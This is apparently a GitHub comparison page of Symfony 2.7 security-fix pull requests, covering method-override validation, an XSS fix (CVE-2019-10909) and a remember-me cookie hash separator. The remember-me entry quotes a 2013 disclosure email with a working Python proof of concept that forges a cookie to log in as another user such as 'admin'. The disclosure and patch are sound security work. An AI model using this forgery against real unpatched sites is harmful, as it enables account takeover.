Comparing changes

@michaelcullum

…ide (nicolas-grekas) This PR was merged into the 2.7 branch. Discussion ---------- [HttpFoundation] reject invalid method override | Q | A | ------------- | --- | Branch? | 3.4 | Bug fix? | yes | New feature? | no | BC breaks? | no | Deprecations? | no | Tests pass? | yes | Fixed tickets | - | License | MIT | Doc PR | - From https://www.intigriti.com/company/submission/CfDJ8Pja6NZvkpNCmx5vVyiGSn7LV-k0ZJ4JlDGSPAaBG1sG1aNinWbVYRos8ldmLPCMSPdHLrwLufz8lXoJ-UNS3XW1_Xkxc7u9rIaENVJ_-nQV_uic7D1tmRhB6PFiBkRgBA About `Request::getMethod`: > There will be developers, who expect the http method to be valid and therefore will use the return value unescaped in sql, html or other dangerous places. this is what this PR improves, forcing only ASCII letters in overridden methods. > It is possible to set the header to "GET", "HEAD", "OPTIONS" and "TRACE". Because of this, the method Request::isMethodSafe() returns true, although the actual http method is post. I don't think this creates any issue: not fixed. > Normally, if you try to provide a request body in a GET-Request, the web server discards the request body. This security functionality can be completely bypassed through this. [...] Recommendation: Remove the parsed body params from the request object, if a method without a body is set. I don't think this is valid: actually we *do* populate `$request->request` with the body of GET requests when some is sent. > Even if very rare, some users still use old browsers, where CORS is not available. Or a server admin allowed headers to be cross origin. In those cases this functionality enables CSRF-Attackes, if the developers trusts the http method. (E.g. Shopware does this). I don't understand this, not addressed. ping @michaelcullum if you want to answer the person. And other to review :) Commits ------- 6ce9991392 [HttpFoundation] reject invalid method override

@pborreli

…e cookie hash (pborreli) This PR was merged into the 2.7 branch. Discussion ---------- [Security] Add a separator in the remember me cookie hash Fabien found this issue reported back in 2013 but it was never resolved. Pascal (@pborreli) did the original patch. ``` > -------- Original Message -------- > Subject: No structure in remember me MAC > Date: Tue, 4 Jun 2013 09:46:21 +0100 > From: Jon Cave <[email protected]> > To: [email protected] > > I have discovered a vulnerability in the Symfony framework that > affects version 2.3 and all other 2.x releases. The vulnerability > would allow an attacker to authenticate as a privileged user on sites > with user registration and remember me login functionality enabled. > > The problem is that there is no structure in the data that is passed > to the hash function when generating a MAC for remember me cookies. > From > Symfony\Component\Security\Http\RememberMe\TokenBasedRememberMeServices::generateCookieHash(): > > return hash('sha256', > $class.$username.$expires.$password.$this->getKey()); > > This means that there are many inputs that result in the same hash. > For example, a user can register with username "admin9" and receive > the following cookie: "<class>:admin9:1370334467:<hash>" where <hash> > is hash('sha256', "<class>admin91370334467<password><key>"). This > cookie can then be modified to be: "<class>:admin:91370334467:<hash>" > where <hash> is the same value as before. The application will load > the "admin" user and recognise the provided hash as valid! (NB: I left > out some base64 encoding to make things more obvious.) > > The solution to this is to use the same separator when generating the > hash as is done when encoding the cookie, e.g.: > > return hash('sha256', $class . ':' . $username . ':' . $expires . > ':' . $password . ':' . $this->getKey()); > > It would also be a good idea to switch to using hash_hmac(): > > return hash_hmac('sha256', $class . ':' . $username . ':' . $expires > . ':' . $password, $this->getKey()); > > This is because HMAC is a stronger MAC construction than the secret > suffix one currently being used [1]. > > Let me know if you have any questions. > > Cheers, > Jon > http://joncave.co.uk/ > @joncave > > [1] > http://rdist.root.org/2009/10/29/stop-using-unsafe-keyed-hashes-use-hmac/ > > Proof of concept code to perform the attack given a valid cookie to modify: > > import base64 > import requests > import sys > > if __name__ == "__main__": > if len(sys.argv) != 3: > print "COOKIE URL" > sys.exit(1) > > cookie = sys.argv[1] # Current cookie > url = sys.argv[2] # URL > > cls, name, expires, mac = base64.b64decode(cookie).split(":") > > # Tamper > name = base64.b64decode(name) > expires = name[-1] + expires > name = base64.b64encode(name[:-1]) > > # Reconstruct > cookie = ":".join([cls, name, expires, mac]) > > print "Using cookie: " + cookie > print > > cookies = {"REMEMBERME": base64.b64encode(cookie)} > print requests.get(url, cookies=cookies).text > > ``` Commits ------- 6356982017 [Security] Add a separator in the remember me cookie hash

…e form theme of the PHP templating engine - CVE-2019-10909 (stof) This PR was merged into the 2.7 branch. Discussion ---------- [FrameworkBundle][Form] Fix XSS issues in the form theme of the PHP templating engine - CVE-2019-10909 https://www.intigriti.com/researcher/submission/CfDJ8Pja6NZvkpNCmx5vVyiGSn4K0Hgfyo6ynNDaSmw63JqRiMJ1Arv1xOxeLFRsv7xVI0MAspfOj8pKsT-ruB6Pfx5HvSOKt0UzPUqqpEWtGNo2kb3xuLP19uhpuMvrZOXnDA ![image](https://user-images.githubusercontent.com/211740/55671589-dc3d0700-5891-11e9-8420-2ab8961c69db.png) Commits ------- e645e2aa7e Fix XSS issues in the form theme of the PHP templating engine

…ekas) This PR was merged into the 2.7 branch. Discussion ---------- [DI] Check service IDs are valid Based on #87 Commits ------- 0671884f41 [DI] Check service IDs are valid

released v2.7.51

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

Comparing changes

Open a pull request

Commits on Apr 16, 2019

Commits on Apr 17, 2019

This comparison is taking too long to generate.

Uh oh!